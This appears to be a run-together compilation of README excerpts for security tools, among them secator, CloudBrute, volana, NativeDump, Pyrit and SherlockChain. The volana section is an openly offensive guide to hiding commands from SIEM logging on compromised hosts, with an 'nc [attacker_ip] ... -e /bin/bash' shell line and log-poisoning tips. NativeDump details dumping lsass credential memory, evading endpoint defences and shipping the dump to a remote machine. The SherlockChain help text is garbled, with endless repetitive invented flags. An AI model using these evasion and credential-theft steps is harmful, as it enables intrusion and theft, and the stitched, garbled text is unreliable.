secator
is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Complexity from simple tasks to complex workflows
secator
integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator
, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator
uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator
does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt
:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator
comes installed with the minimum amount of dependencies.
There are several addons available for secator
:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator
makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf
):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
and more... to list all tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator
, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt
A detailed usage guide is available on Usage section of the Wiki.
But Some index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available. here
we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operation system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.
It looks like this
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
ββββββββββ βββββββ βββ ββββββββββ βββββββ βββββββ βββ ββββββββββββββββββββ
βββββββββββ ββββββββββββ ββββββββββββββββββββββββββββββ ββββββββββββββββββββ
βββ βββ βββ ββββββ ββββββ ββββββββββββββββββββββ βββ βββ ββββββ
βββ βββ βββ ββββββ ββββββ ββββββββββββββββββββββ βββ βββ ββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββ ββββββββββββ βββ ββββββββ
βββββββββββββββ βββββββ βββββββ βββββββ βββββββ βββ βββ βββββββ βββ ββββββββ
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
for example
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments
If a cloud provider not detected or want force searching on a specific provider, you can use -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug open an issue.
It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.
change -T (timeout) option to get best results for your run.
Inspired by every single repo listed here .
During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana
provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana Β» [command]
Keyword for volana console: * ring
: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit
: exit volana console
Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt
and decrypt
subcommand. Previously, you need to build volana
with embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it with your rce on target machine
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Why not just hide command with echo [command] | base64
? And decode on target with echo [encoded_command] | base64 -d | bash
Because we want to be protected against systems that trigger alert for base64
use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.
Keep in mind that volana
is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected we mean if we are able to trigger an alert if a certain command has been executed.
Only the volana
launching command line will be catched. π§ However, by adding a space before executing it, the default bash behavior is to not save it
.bash_history
, ".zsh_history" etc ..opensnoop
)script
, screen -L
, sexonthebash
, ovh-ttyrec
, etc..)pkill -9 script
screen
is a bit more difficult to avoid, however it does not register input (secret input: stty -echo
=> avoid)volana
with encryption /var/log/auth.log
)sudo
or su
commandslogger -p auth.info "No hacker is poisoning your syslog solution, don't worry"
)LD_PRELOAD
injection to make logSorry for the clickbait title, but no money will be provided for contibutors. π
Let me know if you have found: * a way to detect volana
* a way to spy console that don't detect volana
commands * a way to avoid a detection system
NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).
Usage:
NativeDump.exe [DUMP_FILE]
The default file name is "proc_
The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.
Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine
The project has three branches at the moment (apart from the main branch with the basic technique):
ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk
delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding
remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding
After reading Minidump undocumented structures, its structure can be summed up to:
I created a parsing tool which can be helpful: MinidumpParser.
We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.
The header is a 32-bytes structure which can be defined in C# as:
public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}
The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header
Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:
public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}
The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:
ID | Stream Type |
---|---|
0x00 | UnusedStream |
0x01 | ReservedStream0 |
0x02 | ReservedStream1 |
0x03 | ThreadListStream |
0x04 | ModuleListStream |
0x05 | MemoryListStream |
0x06 | ExceptionStream |
0x07 | SystemInfoStream |
0x08 | ThreadExListStream |
0x09 | Memory64ListStream |
0x0A | CommentStreamA |
0x0B | CommentStreamW |
0x0C | HandleDataStream |
0x0D | FunctionTableStream |
0x0E | UnloadedModuleListStream |
0x0F | MiscInfoStream |
0x10 | MemoryInfoListStream |
0x11 | ThreadInfoListStream |
0x12 | HandleOperationListStream |
0x13 | TokenStream |
0x16 | HandleOperationListStream |
First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:
public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}
The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".
The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:
public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}
As there is only one, it gets simplified to:
public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}
The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.
public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}
Each module entry is a 16-bytes structure:
public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}
The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them
There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:
With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream
After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.
sttr
is command line software that allows you to quickly run various transformation operations on the string.
// With input prompt
sttr
// Direct input
sttr md5 "Hello World"
// File input
sttr md5 file.text
sttr base64-encode image.jpg
// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5
// Writing output to a file
sttr yaml-json file.yaml > file-output.json
You can run the below curl
to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin
folder
curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh
curl -sS https://webi.sh/sttr | sh
curl.exe https://webi.ms/sttr | powershell
See here
If you are on macOS and using Homebrew, you can install sttr
with the following:
brew tap abhimanyu003/sttr
brew install sttr
sudo snap install sttr
yay -S sttr-bin
scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr
go install github.com/abhimanyu003/sttr@latest
Download the pre-compiled binaries from the Release! page and copy them to the desired location.
sttr
command.// For interactive menu
sttr
// Provide your input
// Press two enter to open operation menu
// Press `/` to filter various operations.
// Can also press UP-Down arrows select various operations.
sttr -h
// Example
sttr zeropad -h
sttr md5 -h
sttr {command-name} {filename}
sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
sttr yaml-json file.yaml > file-output.json
curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
sttr md5 hello | sttr base64-encode
echo "Hello World" | sttr base64-encode | sttr md5
These are the few locations where sttr
was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr
to the list.
Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.
Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.
This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.
The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.
The packages needed are mentioned in the requirements.txt
file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.Argument | Description |
---|---|
--analysis-mode | Specifies the mode of operation. Default is static . Choices are static and chroot . |
--static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service . |
--volume-path | Specifies the path to the mounted volume. Default is /mnt . |
--save-file | Specifies the output file for JSON output. |
--info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True . |
--pkg-mgr | Manually specify the package manager or dont add this option for automatic check. |
APT: | |
- Static Info Analysis: | |
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method. | |
- It analyzes the packages installed on the mounted volume located at /mnt . | |
- It saves the output in a JSON file named output.json . | |
- It generates visual plots for CHROOT analysis. |
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
Static Service Analysis:
This command runs the program in static analysis mode, specifically using the Service file analysis method.
/custom_mount
.output.json
.It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
Chroot analysis with or without Graphic output:
/mnt
.output.json
.--info-graphic
as True
else False
bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.
I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help
command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
Vulnerability Detection: The --detect
and --exclude-detectors
options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
--report-format
, --report-output
, and various --report-*
options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).--filter-*
options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.--ai-*
options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.--truffle
and --truffle-build-directory
facilitate the integration of SherlockChain into popular development frameworks like Truffle.The --help
command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
--detect
, --exclude-detectors
--report-format
, --report-output
, --report-*
--filter-*
--ai-*
--truffle
, --truffle-build-directory
--compile
, --list-detectors
, --list-detectors-info
